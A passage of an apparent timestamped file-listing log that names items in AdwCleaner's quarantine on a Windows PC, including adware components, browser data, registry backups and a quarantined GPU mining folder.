         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.7s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.6s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.9s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          1.0s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          1.0s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          1.0s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          1.1s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.1s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.1s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.2s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.2s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.2s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.2s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.2s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.3s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.3s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.3s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.3s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.4s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.4s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.4s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.4s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.5s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.5s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.5s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.5s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.5s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.8s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
